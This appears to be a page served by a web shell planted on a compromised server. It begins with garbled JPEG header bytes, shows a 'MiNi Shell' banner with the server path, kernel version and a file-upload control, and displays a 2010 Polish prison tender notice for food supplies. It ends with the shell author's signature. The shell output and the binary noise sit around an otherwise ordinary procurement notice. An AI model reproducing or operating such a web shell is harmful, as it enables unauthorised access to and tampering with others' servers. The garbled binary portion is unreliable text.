JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100604/155822-N-2010.html

<p class="kh_header"><b>Rzeszów: Dostawy artykułów spożywczych (groch, fasola,  produkty sojowe, cukier, ryż, kasza, mąka, żurek, konserwy rybne).</b><br>
<b>Numer ogłoszenia: 155822 - 2010; data zamieszczenia: 04.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Rzeszowie , ul. Załęska 76, 35-322 Rzeszów, woj. podkarpackie, tel. 017 8580700, faks 0-17 8535420.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych (groch, fasola,  produkty sojowe, cukier, ryż, kasza, mąka, żurek, konserwy rybne)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów spożywczych (grochu, fasoli, produktów sojowych, cukru, ryżu, kasz, mąki, żurku, konserw rybnych).
 Przedmiotem zamówienia są dostawy artykułów     spożywczych do magazynu Zamawiającego w asortymencie i ilościach określonych w załączniku nr 1,2,3,4,5 i 6 do SIWZ (groch, fasola,  produkty sojowe, cukier, ryż, kasza, mąka, żurek, konserwy rybne).
Określone w ogłoszeniu i SIWZ ilości są wielkościami szacunkowymi.
Szczegółowe zapisy związane ze sposobem realizacji zamówienia, warunkami umowy zawiera załącznik nr 15 (projekt umowy) do SIWZ.

TABELA Z ZAŁĄCZNIKA NR 1 DO SIWZ,
Lp.	Asortyment,	KOD CPV, 	Jednostka miary,	Ilość ,

1.	Groch suszony łuskany,	03221220-4,	kg	1 500;
2.	Fasola Jaś suszona średnia,	03221210-1,	kg	2 500;

TABELA Z ZAŁĄCZNIKA NR 2 DO SIWZ,
Lp.	Asortyment, 	KOD CPV, 	Jednostka miary,	Ilość , 

1.	Kostka sojowa,	15610000-7,	kg	600;
2.	Granulat sojowy,	15610000-7,	kg	405;
3.	Kotlety sojowe,	15610000-7,	kg	550;

TABELA Z ZAŁĄCZNIKA NR 3 DO SIWZ,
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Cukier kryształ luz,	158 31000-2,	kg	23 000;

TABELA Z ZAŁĄCZNIKA NR 4 DO SIWZ,
Lp.	Asortyment, 	KOD CPV, 	Jednostka miary,	Ilość,  

1.	Ryż,	156 14100- 6,	kg	5 950;
2.	Kasza jęczmienna (średnia),	156 13000- 8,	kg	5 010;
3.	Kasza  manna,	156 13000- 8,	kg	1 100;
4.	Mąka pszenna (typ 500),	156 12200- 3,	kg	3 000;
5.	Płatki owsiane,	156 13380- 5,	kg	1 000;
6.	Mąka ziemniaczana, 	156 23000- 1,	kg	220;

TABELA Z ZAŁĄCZNIKA NR 5 DO SIWZ
Lp.	Asortyment, 	KOD CPV, 	Jednostka miary,	Ilość , 

1.	Żurek w płynie (na mące żytniej), op. do 5 litrów, 158 51000- 8,litr	700;

TABELA Z ZAŁĄCZNIKA NR 6 DO SIWZ,   
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość , 

1.      Szprot w oleju (konserwa), op. do 400 g.	15240000-2,	kg	800;
2.      Szprot w pomidorach (konserwa), op. do 400 g.	15240000-2, kg	1 600;
3.      Śledź w oleju (konserwa), op. do 400 g.	15240000-2, kg	800;
4.      Śledź w pomidorach (konserwa), op. do 400 g.	15240000-2, kg	1 300;
5.      Paprykarz  szczeciński (konserwa), op. do 400 g. 15240000-2, kg	3 500;
  
     Określona powyżej  ilość towaru  jest  wielkością szacunkową. Zamawiający informuje, że rzeczywista ilość pobranych artykułów może odbiegać od ilości planowanej.
Dopuszcza się możliwość składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 15.60.00.00-4, 15.80.00.00-6, 15.20.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku, gdy Wykonawca jest rolnikiem indywidualnym na podstawie art. 6 ustawy z dnia 11 kwietnia 2003r.  o kształtowaniu ustroju rolnego (Dz. U.  z 2003r. Nr 64, poz. 592 z późn. zm.) załącza do oferty aktualne oświadczenie,  o którym mowa w art. 7 ustawy z dnia 11 kwietnia 2003 r. o kształtowaniu ustroju rolnego: Dowodem potwierdzającym osobiste prowadzenie gospodarstwa rolnego jest oświadczenie prowadzącego to gospodarstwo, poświadczone przez wójta (burmistrza, prezydenta miasta), oświadczenie o którym mowa w art. 7 ust. 1 ustawy z dnia 11 kwietnia 2003r. o kształtowaniu ustroju rolnego, musi być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, mają się w nim znajdować dane dotyczące osoby prowadzącej gospodarstwo rolne, tj.:
- imię i nazwisko,
- adres zamieszkania
- powierzchnia gospodarstwa rolnego,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W paragrafie 3 projektu umowy - zał. nr 15 do SIWZ zapisano:
Ceny określone w niniejszej umowie nie ulegną zmianie przez okres 30 dni od dnia obowiązywania umowy. 
Po wyżej wymienionym okresie Kupujący dopuszcza możliwość uzasadnionych zmian cen artykułów spożywczych pod warunkiem wzrostu lub obniżki (o co najmniej 1%) cen towarów i usług konsumpcyjnych dotyczących żywności (grupa: Żywność i napoje bezalkoholowe). Zmiana cen może następować nie częściej niż raz na miesiąc proporcjonalnie do wskaźnika zmian cen, po ogłoszeniu przez Prezesa Głównego Urzędu Statystycznego wskaźnika cen towarów i usług konsumpcyjnych. Wiążący dla stron umowy będzie publikowany ,,Wskaźnik cen towarów i usług konsumpcyjnych (miesiąc do poprzedniego miesiąca)proporcjonalnie do którego będzie liczona zwyżka lub obniżka cen.
Zmiana cen nastąpi w terminie do 10 dni od opublikowania przedmiotowego wskaźnika.
a)  o planowanym wzroście  cen  Sprzedający  ma obowiązek zawiadomić  Kupującego na piśmie do 5 dni przed terminem obowiązywania nowych cen wraz z podaniem podstawy zmian oraz nowych cen na poszczególny asortyment towaru, 
b) o planowanej obniżce  cen Kupujący powiadomi Sprzedającego  na piśmie do 5 dni przed terminem obowiązywania nowych cen wraz z podaniem podstawy zmian. 
3.Każda zmiana ceny wymaga zgody obydwu stron wyrażonej na piśmie w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.sw.gov.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Rzeszowie, 35-322 Rzeszów, ul. Załęska 76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2010 godzina 11:00, miejsce: Oferty należy składać w sekretariacie Zakładu Karnego w Rzeszowie, 35 - 322 Rzeszów, ul. Załęska 76.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawy artykułów spożywczych (grochu, fasoli).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 1 DO SIWZ,
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,

1.	Groch suszony łuskany,	03221220-4,	kg	1 500;
2.	Fasola Jaś suszona średnia,	03221210-1,	kg	2 500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5, 03.22.12.20-4, 03.22.12.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawy artykułów spożywczych (produktów sojowych).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 2 DO SIWZ,
Lp.	Asortyment, 	KOD CPV, 	Jednostka miary,	Ilość, 

1.	Kostka sojowa,	15610000-7,	kg	600;
2.	Granulat sojowy,	15610000-7,	kg	405;
3.	Kotlety sojowe,	15610000-7,	kg	550;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4, 15.61.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawy artykułów spożywczych  (cukier kryształ).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 3 DO SIWZ,
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Cukier kryształ luz,	158 31000-2,	kg	23 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy artykułów spożywczych (ryżu, kasz, mąki).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 4 DO SIWZ,
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.	Ryż,	156 14100- 6,	kg	5 950;
2.	Kasza jęczmienna (średnia),	156 13000- 8,	kg	5 010;
3.	Kasza  manna,	156 13000- 8,	kg	1 100;
4.	Mąka pszenna (typ 500),	156 12200- 3,	kg	3 000;
5.	Płatki owsiane,	156 13380- 5,	kg	1 000;
6.	Mąka ziemniaczana, 	156 23000- 1,	kg	220;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.61.41.00-6, 15.61.30.00-8, 15.61.22.00-3, 15.61.33.80-5, 15.62.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy artykułów spożywczych (żurku).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 5 DO SIWZ,
Lp.	Asortyment, 	KOD CPV,	 Jednostka miary,	Ilość,  

1.	Żurek w płynie (na mące żytniej) op. do 5 litrów, 158 51000- 8,litr	700;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.85.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawy artykułów spożywczych (konserwy rybne).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TABELA Z ZAŁĄCZNIKA NR 6 DO SIWZ,   
Lp.	Asortyment,  KOD CPV,	Jednostka miary,	Ilość,  

1.         Szprot w oleju (konserwa) op. do 400 g. 15240000-2,	kg	800;
2.         Szprot w pomidorach (konserwa) op. do 400 g.	15240000-2, kg	1 600;
3.         Śledź w oleju (konserwa) op. do 400 g.	15240000-2, kg	800;
4.         Śledź w pomidorach (konserwa) op. do 400 g. 15240000-2, kg	1 300;
5.	Paprykarz szczeciński (konserwa) op. do 400 g.	15240000-2, kg	3 500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.24.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com